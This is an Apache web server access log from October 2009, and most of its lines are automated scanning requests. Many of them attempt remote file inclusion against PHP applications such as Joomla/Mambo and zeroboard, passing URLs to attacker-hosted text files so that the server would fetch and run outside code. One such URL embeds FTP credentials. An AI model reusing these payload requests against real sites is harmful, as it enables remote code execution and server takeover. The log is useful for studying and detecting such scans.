211.172.225.50 - - [13/Oct/2009:03:18:37 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:03:18:37 -0400] "GET /logs/access_log.Q109081300//admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.67.216 - - [13/Oct/2009:03:18:17 -0400] "GET /logs/error_log.Q109081200 HTTP/1.1" 200 3085783 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.172.225.50 - - [13/Oct/2009:03:18:38 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:03:18:38 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:03:18:38 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:03:18:38 -0400] "GET /logs/access_log.Q109081300//admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:03:20:07 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:03:20:08 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:03:20:08 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:03:20:08 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:03:20:09 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:03:20:09 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:03:20:09 -0400] "GET /logs/access_log.Q109081300//admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:03:20:10 -0400] "GET /logs/access_log.Q109081300//admin/classes/TplLoad.php?full_path_to_public_program=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
168.143.19.89 - - [13/Oct/2009:03:20:21 -0400] "GET /logs/access_log.Q109092200/errors.php?error=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
168.143.19.89 - - [13/Oct/2009:03:20:21 -0400] "GET /errors.php?error=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.825"
168.143.19.89 - - [13/Oct/2009:03:20:21 -0400] "GET /logs/errors.php?error=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.825"
206.108.7.161 - - [13/Oct/2009:03:20:23 -0400] "GET /logs/access_log.Q109092200/errors.php?error=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
206.108.7.161 - - [13/Oct/2009:03:20:23 -0400] "GET /errors.php?error=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
206.108.7.161 - - [13/Oct/2009:03:20:23 -0400] "GET /logs/errors.php?error=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
81.12.13.152 - - [13/Oct/2009:03:20:30 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:03:20:30 -0400] "GET /logs/access_log.Q109052500/?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:03:20:30 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 21652 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:20:47 -0400] "GET /logs/access_log.Q109100500//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:20:47 -0400] "GET /logs/access_log.Q109070100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:20:47 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:20:47 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:20:53 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:20:53 -0400] "GET /logs/access_log.Q109070100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:20:53 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:20:53 -0400] "GET /logs/access_log.Q109100500//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:20:59 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:20:59 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:20:59 -0400] "GET /logs/access_log.Q109070100%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:20:59 -0400] "GET /logs/access_log.Q109100500%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.181.7.74 - - [13/Oct/2009:03:21:14 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.185.129.36 - - [13/Oct/2009:03:21:19 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:21:19 -0400] "GET /logs/access_log.Q109100500%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:21:19 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:21:22 -0400] "GET /logs/access_log.Q109070100%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.108.7.161 - - [13/Oct/2009:03:21:35 -0400] "GET /logs/error_log.Q109092300/errors.php?error=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
168.143.19.89 - - [13/Oct/2009:03:21:39 -0400] "GET /logs/error_log.Q109092300/errors.php?error=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
203.185.129.36 - - [13/Oct/2009:03:22:04 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:22:04 -0400] "GET /logs/access_log.Q109070100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:22:04 -0400] "GET /logs/access_log.Q109100100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:22:04 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:03:23:06 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Avant Browser (http://www.avantbrowser.com)"
174.143.3.188 - - [13/Oct/2009:03:23:06 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
174.143.3.188 - - [13/Oct/2009:03:23:07 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
174.143.3.188 - - [13/Oct/2009:03:23:07 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
81.12.13.152 - - [13/Oct/2009:03:23:10 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:03:23:10 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:03:23:10 -0400] "GET /logs/access_log.Q109061400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Oct/2009:03:23:19 -0400] "GET /logs/skin/zero_vote/ask_password.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Oct/2009:03:23:19 -0400] "GET /skin/zero_vote/ask_password.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Oct/2009:03:23:22 -0400] "GET /logs/access_log.Q109051200/skin/zero_vote/ask_password.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Oct/2009:03:23:27 -0400] "GET /logs/access_log.Q109081600/skin/zero_vote/ask_password.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:03:23:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.185.129.36 - - [13/Oct/2009:03:23:56 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:23:56 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:23:56 -0400] "GET /logs/access_log.Q109070100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.185.129.36 - - [13/Oct/2009:03:23:56 -0400] "GET /logs/access_log.Q109100100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Oct/2009:03:24:50 -0400] "GET /include/print_category.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Oct/2009:03:24:50 -0400] "GET /logs/access_log.Q109051500/include/print_category.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Oct/2009:03:24:50 -0400] "GET /logs/include/print_category.php?dir=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:03:25:01 -0400] "GET /errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:03:25:01 -0400] "GET /logs/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:03:25:01 -0400] "GET /logs/access_log.Q109092200/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:03:25:44 -0400] "GET /logs/error_log.Q109092300/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.12.13.152 - - [13/Oct/2009:03:25:59 -0400] "GET /logs/error_log.Q109061900/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:26:00 -0400] "GET /logs/access_log.Q109083100//include/mail.inc.php?skin_board_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:03:26:02 -0400] "GET /logs/access_log.Q109091000//include/mail.inc.php?skin_board_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
123.125.66.95 - - [13/Oct/2009:03:27:40 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [13/Oct/2009:03:28:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.76.230.10 - - [13/Oct/2009:03:29:25 -0400] "GET HTTP/1.1 HTTP/1.1" 400 189 "-" "Toata dragostea mea pentru diavola"
125.76.230.10 - - [13/Oct/2009:03:29:26 -0400] "GET /install.txt HTTP/1.1" 404 209 "-" "Toata dragostea mea pentru diavola"
125.76.230.10 - - [13/Oct/2009:03:29:26 -0400] "GET /cart/install.txt HTTP/1.1" 404 214 "-" "Toata dragostea mea pentru diavola"
125.76.230.10 - - [13/Oct/2009:03:29:27 -0400] "GET /zencart/install.txt HTTP/1.1" 404 217 "-" "Toata dragostea mea pentru diavola"
125.76.230.10 - - [13/Oct/2009:03:29:27 -0400] "GET /zen-cart/install.txt HTTP/1.1" 404 218 "-" "Toata dragostea mea pentru diavola"
125.76.230.10 - - [13/Oct/2009:03:29:28 -0400] "GET /zen/install.txt HTTP/1.1" 404 213 "-" "Toata dragostea mea pentru diavola"
125.76.230.10 - - [13/Oct/2009:03:29:29 -0400] "GET /shop/install.txt HTTP/1.1" 404 214 "-" "Toata dragostea mea pentru diavola"
125.76.230.10 - - [13/Oct/2009:03:29:29 -0400] "GET /butik/install.txt HTTP/1.1" 404 215 "-" "Toata dragostea mea pentru diavola"
125.76.230.10 - - [13/Oct/2009:03:29:30 -0400] "GET /zcart/install.txt HTTP/1.1" 404 215 "-" "Toata dragostea mea pentru diavola"
125.76.230.10 - - [13/Oct/2009:03:29:30 -0400] "GET /shop2/install.txt HTTP/1.1" 404 215 "-" "Toata dragostea mea pentru diavola"
125.76.230.10 - - [13/Oct/2009:03:29:33 -0400] "GET /catalog/install.txt HTTP/1.1" 404 217 "-" "Toata dragostea mea pentru diavola"
83.245.237.210 - - [13/Oct/2009:03:29:34 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
83.245.237.210 - - [13/Oct/2009:03:29:34 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
125.76.230.10 - - [13/Oct/2009:03:29:34 -0400] "GET /boutique/install.txt HTTP/1.1" 404 218 "-" "Toata dragostea mea pentru diavola"
83.245.237.210 - - [13/Oct/2009:03:29:35 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
83.245.237.210 - - [13/Oct/2009:03:29:35 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)"
125.76.230.10 - - [13/Oct/2009:03:29:35 -0400] "GET /cart/install.txt HTTP/1.1" 404 214 "-" "Toata dragostea mea pentru diavola"
125.76.230.10 - - [13/Oct/2009:03:29:35 -0400] "GET /store/install.txt HTTP/1.1" 404 215 "-" "Toata dragostea mea pentru diavola"
193.4.113.98 - - [13/Oct/2009:03:30:51 -0400] "GET /logs/access_log.Q109052500%20%20/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:03:30:51 -0400] "GET /////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 200 459 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:03:30:51 -0400] "GET /logs/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 200 21664 "-" "Mozilla/5.0"
65.55.106.132 - - [13/Oct/2009:03:32:41 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.4.113.98 - - [13/Oct/2009:03:32:45 -0400] "GET /logs/access_log.Q109100500%20%20/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:03:32:54 -0400] "GET /logs/access_log.Q109092200/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:03:32:57 -0400] "GET /////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 200 459 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:03:32:57 -0400] "GET /logs/access_log.Q109052500%20%20/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:03:32:57 -0400] "GET /logs/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 200 21664 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:03:33:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.27.203.107 - - [13/Oct/2009:03:33:28 -0400] "GET /logs/error_log.Q109092300/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
193.4.113.98 - - [13/Oct/2009:03:34:48 -0400] "GET /logs/access_log.Q109100500%20%20/////////?_zb_path=http://cafe5.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:34:52 -0400] "GET /contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:34:52 -0400] "GET /logs/contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:34:53 -0400] "GET /contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:34:53 -0400] "GET /logs/contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:35:04 -0400] "GET /logs/access_log.Q109082800/contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:03:35:05 -0400] "GET /logs/access_log.Q109082800/contenido.php?sec=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
61.199.232.195 - - [13/Oct/2009:03:35:12 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
84.53.83.238 - - [13/Oct/2009:03:35:22 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
84.53.83.238 - - [13/Oct/2009:03:35:22 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
84.53.83.238 - - [13/Oct/2009:03:35:26 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
84.53.83.238 - - [13/Oct/2009:03:35:26 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
174.143.3.188 - - [13/Oct/2009:03:35:35 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Avant Browser (http://www.avantbrowser.com)"
174.143.3.188 - - [13/Oct/2009:03:35:35 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
174.143.3.188 - - [13/Oct/2009:03:35:35 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
174.143.3.188 - - [13/Oct/2009:03:35:35 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
